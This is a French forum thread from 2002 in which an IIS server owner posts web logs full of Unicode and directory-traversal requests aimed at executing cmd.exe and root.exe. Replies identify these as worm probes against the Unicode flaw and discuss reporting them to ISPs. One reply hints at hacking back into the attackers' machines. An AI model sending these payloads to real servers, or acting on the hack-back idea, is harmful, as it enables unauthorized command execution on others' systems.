Salut,
 
Mon serveur IIS est installé depuis une semaine et mes fichiers log font des kilomètres... mais ce n'est pas des visites... mais plutot des "attaques". Je commence donc en a avoir marre... j'ai découvert que 90% de ces attaques viennent de Club-Internet (le même FAI que le mien ) et de Madridtel... J'ai donc décidé d'envoyer un mail à ces FAI mais comme je n'ai pas l'habitude de cela je voudrais ce que je dois y mettre... Je compte mettre une copie d'une partie de mes logs mais que dois-je préciser en plus ?
 
Voila un exemple de mes logs (ca c'est c'est les logs pour aujourd'hui... et encore c'est assez calme aujourd'hui )
2002-09-30 05:17:44 210.99.214.x - 127.0.0.1 80 GET /winnt/system32/cmd.exe /c+dir 404 -
2002-09-30 05:17:46 210.99.214.x - 127.0.0.1 80 GET /winnt/system32/cmd.exe /c+dir 404 -
2002-09-30 05:17:47 210.99.214.x - 127.0.0.1 80 GET /scripts/..Á%pc../winnt/system32/cmd.exe /c+dir 500 -
2002-09-30 05:17:49 210.99.214.x - 127.0.0.1 80 GET /scripts/..À%9v../winnt/system32/cmd.exe /c+dir 500 -
2002-09-30 05:17:50 210.99.214.x - 127.0.0.1 80 GET /scripts/..À%qf../winnt/system32/cmd.exe /c+dir 500 -
2002-09-30 05:17:51 210.99.214.x - 127.0.0.1 80 GET /scripts/..Á%8s../winnt/system32/cmd.exe /c+dir 500 -
2002-09-30 05:17:52 210.99.214.x - 127.0.0.1 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 500 -
2002-09-30 05:17:53 210.99.214.x - 127.0.0.1 80 GET /winnt/system32/cmd.exe /c+dir 404 -
2002-09-30 05:17:59 210.99.214.x - 127.0.0.1 80 GET /scripts/..o../winnt/system32/cmd.exe /c+dir 404 -
2002-09-30 05:18:01 210.99.214.x - 127.0.0.1 80 GET /winnt/system32/cmd.exe /c+dir 404 -
2002-09-30 05:18:03 210.99.214.x - 127.0.0.1 80 GET /scripts/..ð??¯../winnt/system32/cmd.exe /c+dir 404 -
2002-09-30 05:18:05 210.99.214.x - 127.0.0.1 80 GET /scripts/..ø???¯../winnt/system32/cmd.exe /c+dir 404 -
2002-09-30 05:18:10 210.99.214.x - 127.0.0.1 80 GET /scripts/..ü????¯../winnt/system32/cmd.exe /c+dir 404 -
2002-09-30 05:18:12 210.99.214.x - 127.0.0.1 80 GET /winnt/system32/cmd.exe /c+dir 404 -
2002-09-30 08:26:00 212.194.149.1xx - 127.0.0.1 80 GET /scripts/root.exe /c+dir 404 -
2002-09-30 08:26:00 212.194.149.1xx - 127.0.0.1 80 GET /MSADC/root.exe /c+dir 403 -
2002-09-30 08:26:02 212.194.149.1xx - 127.0.0.1 80 GET /c/winnt/system32/cmd.exe /c+dir 404 -
2002-09-30 08:26:02 212.194.149.1xx - 127.0.0.1 80 GET /d/winnt/system32/cmd.exe /c+dir 404 -
2002-09-30 08:26:02 212.194.149.1xx - 127.0.0.1 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-09-30 08:26:02 212.194.149.1xx - 127.0.0.1 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-09-30 08:26:03 212.194.149.1xx - 127.0.0.1 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2002-09-30 08:26:03 212.194.149.1xx - 127.0.0.1 80 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir 403 -
2002-09-30 08:26:03 212.194.149.1xx - 127.0.0.1 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 500 -
2002-09-30 08:26:05 212.194.149.1xx - 127.0.0.1 80 GET /scripts/winnt/system32/cmd.exe /c+dir 404 -
2002-09-30 08:26:05 212.194.149.1xx - 127.0.0.1 80 GET /winnt/system32/cmd.exe /c+dir 404 -
2002-09-30 08:26:05 212.194.149.1xx - 127.0.0.1 80 GET /winnt/system32/cmd.exe /c+dir 404 -
2002-09-30 08:26:06 212.194.149.1xx - 127.0.0.1 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-09-30 08:26:06 212.194.149.1xx - 127.0.0.1 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-09-30 08:26:06 212.194.149.1xx - 127.0.0.1 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-09-30 08:26:07 212.194.149.1xx - 127.0.0.1 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 500 -
2002-09-30 08:44:03 212.49.95.xx - 127.0.0.1 80 GET /scripts/root.exe /c+dir 404 -
2002-09-30 08:44:06 212.49.95.xx - 127.0.0.1 80 GET /MSADC/root.exe /c+dir 403 -
2002-09-30 08:44:08 212.49.95.xx - 127.0.0.1 80 GET /c/winnt/system32/cmd.exe /c+dir 404 -
2002-09-30 08:44:12 212.49.95.xx - 127.0.0.1 80 GET /d/winnt/system32/cmd.exe /c+dir 404 -
2002-09-30 08:44:14 212.49.95.xx - 127.0.0.1 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-09-30 08:44:16 212.49.95.xx - 127.0.0.1 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-09-30 08:44:18 212.49.95.xx - 127.0.0.1 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2002-09-30 08:44:20 212.49.95.xx - 127.0.0.1 80 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir 403 -
2002-09-30 08:44:22 212.49.95.xx - 127.0.0.1 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 500 -
2002-09-30 08:44:25 212.49.95.xx - 127.0.0.1 80 GET /scripts/winnt/system32/cmd.exe /c+dir 404 -
2002-09-30 08:44:28 212.49.95.xx - 127.0.0.1 80 GET /winnt/system32/cmd.exe /c+dir 404 -
2002-09-30 08:44:30 212.49.95.xx - 127.0.0.1 80 GET /winnt/system32/cmd.exe /c+dir 404 -
2002-09-30 08:44:35 212.49.95.xx - 127.0.0.1 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-09-30 08:44:37 212.49.95.xx - 127.0.0.1 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-09-30 08:44:39 212.49.95.xx - 127.0.0.1 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-09-30 08:44:40 212.49.95.xx - 127.0.0.1 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 500 -
2002-09-30 12:24:11 212.194.143.xxx - 127.0.0.1 80 GET /scripts/root.exe /c+dir 404 -
2002-09-30 12:24:11 212.194.143.xxx - 127.0.0.1 80 GET /MSADC/root.exe /c+dir 403 -
2002-09-30 12:24:11 212.194.143.xxx - 127.0.0.1 80 GET /c/winnt/system32/cmd.exe /c+dir 404 -
2002-09-30 12:24:12 212.194.143.xxx - 127.0.0.1 80 GET /d/winnt/system32/cmd.exe /c+dir 404 -
2002-09-30 12:24:12 212.194.143.xxx - 127.0.0.1 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-09-30 12:24:12 212.194.143.xxx - 127.0.0.1 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-09-30 12:24:13 212.194.143.xxx - 127.0.0.1 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2002-09-30 12:24:13 212.194.143.xxx - 127.0.0.1 80 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir 403 -
2002-09-30 12:24:13 212.194.143.xxx - 127.0.0.1 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 500 -
2002-09-30 12:24:14 212.194.143.xxx - 127.0.0.1 80 GET /scripts/winnt/system32/cmd.exe /c+dir 404 -
2002-09-30 12:24:14 212.194.143.xxx - 127.0.0.1 80 GET /winnt/system32/cmd.exe /c+dir 404 -
2002-09-30 12:24:14 212.194.143.xxx - 127.0.0.1 80 GET /winnt/system32/cmd.exe /c+dir 404 -
2002-09-30 12:24:15 212.194.143.xxx - 127.0.0.1 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-09-30 12:24:15 212.194.143.xxx - 127.0.0.1 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-09-30 12:24:15 212.194.143.xxx - 127.0.0.1 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-09-30 12:24:15 212.194.143.xxx - 127.0.0.1 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 500 -

Tu as quoi comme connexion ?
 
Tu devrais deja commencer a interdire l'execution sur ton serveur ! Parce que ceux qui viennent chez toi on l'air de bien s'amuser.

 
Une connexion ADSL, c'est du Netissimo 1.

C quoi exactement comme serveur parce que je n'y connait pas trop. ms tu ne peux pas interdire l'execution de commande dessus ?

C'est un serveur HTTP sous IIS 5.0 mais de toute facon il y a l'interditcion d'execution au niveau du repertoire du site... de plus l'autre jour on m'a dis que cela ne risque rien tant que mon serveur est patché et mis a jour (ce qui est le cas).

ecris a abuse@"FAI"
mais ce sont des attaques cherchant la faille UNICODE donc tu ne crains rien
il faut savoir que tu as peu de chances que ton mail arrete ces attaques

Tu peut toujours envoyer des plaintes aux FAI, mais bon ca changera rien du tout, y'a des milliers de scanneurs / hackeurs dans le monde.

Je ne c pas du tout, a mon avis tu dois envoyer un mail au service client de C I et tu leur demande ce que tu dois faire.

Si tu n'avais pas patché à l'heure actuelle tu aurais CodeRed ou Nimda comme vers
 
Dans les log : les erreurs 400 et 500 sont la preuve que ca ne marche pas... lance quand même de temps à autre un scan AV.

 
Merci j'ai déjà les adresses mail Je sais que j'ai peu de chance que ca s'arrete mais bon je veux quand meme écrire pour le principe... car j'ai des logs qui font des kilomètres...
Sinon dans mon mail je merts quoi ? juste mes logs et j'explique rapidement la situation ?

Requin a écrit a écrit : Si tu n'avais pas patché à l'heure actuelle tu aurais CodeRed ou Nimda comme vers   Dans les log : les erreurs 400 et 500 sont la preuve que ca ne marche pas... lance quand même de temps à autre un scan AV.

 
Ok ! au fait merci pour les softs que tu m'a conseillé l'autre jour (pour tester IIS) ca marche trés bien !

Pour le mail laisse tomber, c'est un vers qui fait cela de manière totalement automatique.  
 
En apprenant un petit peu sur ce bug tu pourrais à la limite faire des crasses aux autres (en fait tu peux executer en tant que I_USR à peu prêt n'importe quoi sur sa machine.

 
Ok, l'autre jour j'ai fais un "net send" vers une adresse IP qui est apparue plusieurs centaines de fois... mais j'ai pas eu de réponses

Webman a écrit a écrit :     Ok, l'autre jour j'ai fais un "net send" vers une adresse IP qui est apparue plusieurs centaines de fois... mais j'ai pas eu de réponses

 
Bah le gars auras reçu un avertissement c'est déjà cela...

En théorie, il faut écrire au FAI qui héberge "l'attaquant" et lui envoyer ton fichier log. S'il y a moins de quelques centaines de tentatives sur une période courte, ce n'est pas la peine.
Ca ne veut pas dire non plus que tu auras des réponses ou que ce sera suivi d'effet. Disons que si plusieurs personnes s'en plaignent, ça peut constituer un dossier qui peut finir par aboutir...
Depuis la large diffusion des firewalls perso, il y a trop de plaintes et les FAI n'ont plus le temps. Ils ne regardent donc (enfin je suppose) que les abus les plus importants.
 

Ok !
En tout cas merci à tous de vos réponses !